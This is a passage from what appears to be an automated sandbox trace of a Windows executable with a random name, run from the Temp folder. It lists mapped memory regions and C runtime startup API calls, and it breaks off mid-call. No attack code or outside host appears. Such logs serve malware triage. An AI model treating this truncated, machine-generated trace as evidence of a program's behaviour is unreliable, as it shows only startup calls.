entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7716 start_va = 0x11f0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 7717 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 7768 start_va = 0x12c0000 end_va = 0x139efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 7769 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7770 start_va = 0x290000 end_va = 0x292fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7771 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Thread: id = 78 os_tid = 0xdd0 [0113.431] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x818f35e0, dwHighDateTime=0x1d440a9)) [0113.431] GetCurrentProcessId () returned 0xdcc [0113.431] GetCurrentThreadId () returned 0xdd0 [0113.431] GetTickCount () returned 0x27251 [0113.431] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=17021983681) returned 1 [0113.431] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0113.431] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0113.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.433] GetCurrentThreadId () returned 0xdd0 [0113.433] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12b07d0)) [0113.433] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0113.433] GetFileType (hFile=0x3) returned 0x0 [0113.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.433] GetFileType (hFile=0x7) returned 0x0 [0113.433] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.433] GetFileType (hFile=0xb) returned 0x0 [0113.433] SetHandleCount (uNumber=0x20) returned 0x20 [0113.433] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0113.433] GetEnvironmentStringsW () returned 0x2cfc80* [0113.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0113.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12b11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0113.434] FreeEnvironmentStringsW (penv=0x2cfc80) returned 1 [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] GetACP () returned 0x4e4 [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] IsValidCodePage (CodePage=0x4e4) returned 1 [0113.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0113.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.434] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0113.435] GetLastError () returned 0x6 [0113.435] SetLastError (dwErrCode=0x6) [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ") returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0113.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x2e\x4a\xca\x77\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.435] GetLastError () returned 0x6 [0113.435] SetLastError (dwErrCode=0x6) [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ") returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0113.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x2e\x4a\xca\x77\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.435] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError 